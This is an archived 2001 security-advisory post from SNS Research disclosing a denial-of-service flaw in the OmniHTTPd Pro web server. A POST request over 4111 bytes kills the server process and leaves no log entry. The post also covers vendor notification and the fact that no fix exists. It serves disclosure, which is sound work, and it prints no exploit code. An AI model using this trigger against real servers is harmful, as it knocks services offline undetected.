OmniHTTPd Pro Denial of Service Vulnerability

From: SNS Research (vuln-devat_private)
Date: Tue May 15 2001 - 14:27:59 PDT

Next message: Marc Maiffret: "iPlanet - Netscape Enterprise Web Publisher Buffer Overflow"

Previous message: Sym Security: "Re: Corsaire Limited Security Advisory - Symantec/Axent NetProwler 3. 5.x database configuration"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Strumpf Noir Society Advisories
! Public release !
<--#


-= OmniHTTPd Pro Denial of Service Vulnerability =-

Release date: Tuesday, May 15, 2001


Introduction:

OmniHTTPd Pro is a powerful all-purpose industry compliant web 
server built specifically for the Windows 9x and NT platforms. 

OmniHTTPd Pro can be obtained at vendor Omnicron Technologies' 
website: http://www.omnicron.ca


Problem:

The OmniHTTPd Pro web server is susceptible to a DoS through a 
lengthy POST request. If such a request is made to the server 
which exceeds 4111 bytes in size the server process will die. 
Neither the request or the crash are recorded in the server 
logfiles.


(..)


Solution:

The vendor was initially notified on the 23rd of April, 2001. After 
several attempts on our part to follow up on this, salesat_private 
on May 2nd told us the matter was under investigation. Momentarily 
no fix for the problem appears forthcoming.

This was tested against OmniHTTPd Pro v2.08 on WINNT4.


yadayadayada

Free sk8! (http://www.freesk8.org)

SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html) 
compliant, all information is provided on AS IS basis.

EOF, but Strumpf Noir Society will return!

Next message: Marc Maiffret: "iPlanet - Netscape Enterprise Web Publisher Buffer Overflow"
Previous message: Sym Security: "Re: Corsaire Limited Security Advisory - Symantec/Axent NetProwler 3. 5.x database configuration"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed May 16 2001 - 02:29:25 PDT